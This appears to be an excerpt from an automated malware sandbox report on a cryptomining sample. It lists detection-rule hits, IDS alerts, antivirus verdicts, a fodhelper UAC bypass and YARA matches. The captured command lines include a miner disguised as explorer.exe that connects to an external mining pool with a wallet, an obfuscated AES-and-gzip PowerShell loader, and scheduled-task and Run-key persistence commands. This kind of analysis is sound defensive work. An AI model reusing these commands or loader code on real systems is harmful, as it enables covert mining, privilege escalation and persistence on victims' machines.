        Source: Process started, Author: Joe Security: Data: Command: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth , CommandLine: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth , CommandLine|base64offset|contains: "+~~), Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe", ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 7536, ParentProcessName: conhost.exe, ProcessCommandLine: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth , ProcessId: 1528, ProcessName: explorer.exe

        System Summary

        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 
'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] ('')); , CommandLine: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju
        Source: Process started, Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community: Data: Command: "cmd.exe" , CommandLine: "cmd.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\fodhelper.exe, ParentImage: C:\Windows\System32\fodhelper.exe, ParentProcessId: 6184, ParentProcessName: fodhelper.exe, ProcessCommandLine: "cmd.exe" , ProcessId: 5900, ProcessName: cmd.exe
        Source: Process started, Author: Jonathan Cheong, oscd.community: Data: Command: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", CommandLine: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\paint.exe", ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 7704, ParentProcessName: conhost.exe, ProcessCommandLine: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", ProcessId: 2968, ProcessName: cmd.exe
        Source: Process started, Author: Jonathan Cheong, oscd.community: Data: Command: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", CommandLine: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\paint.exe", ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 7704, ParentProcessName: conhost.exe, ProcessCommandLine: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", ProcessId: 2968, ProcessName: cmd.exe
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fuLUlHVbHHgj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NnulhBqzTpRDhV,[Parameter(Position=1)][Type]$OFCpxNfkPy)$qvWXxLMOaNu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Me'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+'odul'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+'e'+'T'+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+''+'a'+'ss'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+'a'+'s'+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qvWXxLMOaNu.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'Pu'+'b'+''+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+',Ma'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$qvWXxLMOaNu.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+'u'+'
'+[Char](98)+'l'+[Char](105)+'c'+','+''+[Char](72)+''+[Char](105)+'de'+'B'+''+'y'+''+'S'+'i'+[Char](103)+','+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+'ot'+[Char](44)+''+'V'+''+'i'+''+'r'+'t'+[Char](117)+''+'a'+'l',$OFCpxNfkPy,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+','+'M'+'a'+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $qvWXxLMOaNu.CreateType();}$iKNksxDtTNKAc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$yNoIOiWMAQGoVU=$iKNk
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fuLUlHVbHHgj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NnulhBqzTpRDhV,[Parameter(Position=1)][Type]$OFCpxNfkPy)$qvWXxLMOaNu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Me'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+'odul'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+'e'+'T'+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+''+'a'+'ss'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+'a'+'s'+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qvWXxLMOaNu.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'Pu'+'b'+''+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+',Ma'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$qvWXxLMOaNu.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+'l'+[Char](105)+'c'+','+''+[C
har](72)+''+[Char](105)+'de'+'B'+''+'y'+''+'S'+'i'+[Char](103)+','+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+'ot'+[Char](44)+''+'V'+''+'i'+''+'r'+'t'+[Char](117)+''+'a'+'l',$OFCpxNfkPy,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+','+'M'+'a'+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $qvWXxLMOaNu.CreateType();}$iKNksxDtTNKAc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$yNoIOiWMAQGoVU=$iKNk
        Source: Process started, Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine|base64offset|contains: 7z, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6052, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, ProcessId: 7820, ProcessName: schtasks.exe
        Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] ('')); , CommandLine: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju
        Source: File created | Author: Subhash Popuri (@pbssubhash) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1784, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
        Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6052, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR
        Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1784, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
        Source: Registry Key set | Author: frack113, Florian Roth (Nextron Systems) | Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6052, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR
        Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2968, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", ProcessId: 7796, ProcessName: schtasks.exe
        Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\b.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7380, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 1784, ProcessName: powershell.exe
        Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 7712, ProcessName: svchost.exe
        Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
        2024-10-08T00:24:19.090576+0200 | 2036289 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.10 | 58455 | 1.1.1.1 | 53 | UDP
        2024-10-08T00:23:47.629655+0200 | 2826930 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.10 | 54464 | 45.76.89.70 | 80 | TCP

        AV Detection

        Source: e7WMhx18XN.exe | Avira: detected
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Avira: detection malicious, Label: HEUR/AGEN.1344832
        Source: C:\Users\user\AppData\Local\Temp\services64.exe | Avira: detection malicious, Label: HEUR/AGEN.1344202
        Source: C:\Users\user\AppData\Local\Temp\paint.exe | Avira: detection malicious, Label: HEUR/AGEN.1344202
        Source: e7WMhx18XN.exe | ReversingLabs: Detection: 52%
        Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Joe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\services64.exe | Joe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\paint.exe | Joe Sandbox ML: detected
        Source: e7WMhx18XN.exe | Joe Sandbox ML: detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 56_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,56_2_00401000

        Privilege Escalation

        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe | Registry value created: NULL cmd.exe
        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe | Registry value created: DelegateExecute

        Bitcoin Miner

        Source: Yara match | File source: Process Memory Space: conhost.exe PID: 7536, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: conhost.exe PID: 6140, type: MEMORYSTR
        Source: Yara match | File source: dump.pcap, type: PCAP
        Source: Yara match | File source: 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000003.1510372978.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000003.1490294728.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000003.1492275711.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000003.1480698288.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000003.1514543598.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000003.1483759497.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000003.1473812913.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000003.1501988421.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000003.1482207840.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
